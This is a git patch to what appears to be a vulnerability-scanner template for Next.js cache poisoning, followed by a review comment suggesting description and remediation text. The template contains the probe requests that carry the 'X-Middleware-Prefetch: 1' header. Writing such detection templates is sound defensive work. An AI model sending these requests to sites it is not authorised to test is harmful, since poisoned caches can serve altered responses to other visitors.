From 0f98f845dd776edb8147cea719e000d07e7cab66 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:41:00 +0530 Subject: [PATCH] Update nextjs-middleware-cache.yaml --- .../nextjs/nextjs-middleware-cache.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index 78b95503f8..ee2bd67def 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -1,9 +1,11 @@ id: nextjs-middleware-cache info: - name: Next.js Cache Poisoning using X-Middleware-Prefetch + name: Next.js - Cache Poisoning author: DhiyaneshDk severity: high + description: | + Next.js is vulnerable to Cache Poisoning using X-Middleware-Prefetch. reference: - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole metadata: @@ -25,22 +27,18 @@ http: - | GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Middleware-Prefetch: 1 Priority: u=1 - | - @timeout: 5s + @timeout: 10s GET /?cb={{rand}} HTTP/1.1 Host: {{Hostname}}
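Review bot: The `description:` added to the `info` block in the first hunk only restates the old title, so someone triaging a `severity: high` hit still cannot tell what a match demonstrates or what to change. I would state the condition, e.g. `A response to a request carrying X-Middleware-Prefetch appears to be stored by the cache in front of the Next.js application and may then be served to other visitors of the same URL.`, and add a `remediation:` entry such as `Strip X-Middleware-Prefetch at the CDN or reverse proxy, or make it part of the cache key.` Both wordings are inferred from the title and the request headers visible in this patch, so check them against the referenced write-up; the matchers are outside these hunks. The shortened `name` also drops the header name, leaving the description as the only place in `info` that identifies the technique.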